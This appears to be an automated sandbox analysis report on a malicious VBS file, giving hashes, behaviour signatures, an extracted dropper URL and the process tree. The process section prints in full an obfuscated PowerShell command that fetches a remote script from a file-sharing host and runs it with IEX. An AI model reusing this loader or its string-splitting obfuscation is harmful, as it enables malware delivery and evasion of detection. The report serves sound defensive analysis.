Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
121s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
04/02/2024, 04:57
Static task
static1
Behavioral task
behavioral1
Sample
8e44eb8b76e7cfe54abc30226f76b61f.vbs
Resource
win7-20231215-en
4 signatures
150 seconds
Behavioral task
behavioral2
Sample
8e44eb8b76e7cfe54abc30226f76b61f.vbs
Resource
win10v2004-20231222-en
6 signatures
150 seconds
General
-
Target
8e44eb8b76e7cfe54abc30226f76b61f.vbs
-
Size
950B
-
MD5
8e44eb8b76e7cfe54abc30226f76b61f
-
SHA1
84bb3650430163978ef1918ba6edaee9a7705389
-
SHA256
9d8af568b0657ff10c735bce816033ce6f844aed1879f94ab6e1fee8a8da3677
-
SHA512
22bef15c37064a79bcaaca8648b7b52c221fb25b51473a52bf2ec5804c7f2927733183a9e676572b749bef073c733b47cbc08a1c23e462da879b671923c5bc0c
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
https://transfer.sh/1kqpOIu/bypass.txt
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 3024 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3024 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2060 wrote to memory of 3024 2060 WScript.exe 28 PID 2060 wrote to memory of 3024 2060 WScript.exe 28 PID 2060 wrote to memory of 3024 2060 WScript.exe 28
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8e44eb8b76e7cfe54abc30226f76b61f.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2060 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $SZXDCFVGBHNJSDFGH = 'https://transfer.sh/1kqpOIu/bypass.txt';$EDRFGHNJMKDEFGHJ = 'nE----------------EbC++++++++++++++++T'.Replace('----------------','t.W').Replace('++++++++++++++++','lIEN');$SXDCFVGBHNJXDCFVGBHJK = 'DO*************aDST<<<<<<<<<>>>>>>>>>>>G'.Replace('*************','WnLo').Replace('<<<<<<<<<>>>>>>>>>>>','rIn');$SWXDECRFGYHUJISDFVGHJ ='I`EX(n`-------------`c`T $EDRFGHNJMKD<<<<<<<<<<<<<<>>>>>>>>>>>>>>GBHNJSDFGH)'.Replace('-------------','e`W`-Obj`E').Replace('<<<<<<<<<<<<<<>>>>>>>>>>>>>>','EFGHJ).$SXDCFVGBHNJXDCFVGBHJK($SZXDCFV');&('I'+'EX')($SWXDECRFGYHUJISDFVGHJ -Join '')|&('I'+'EX');2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3024
-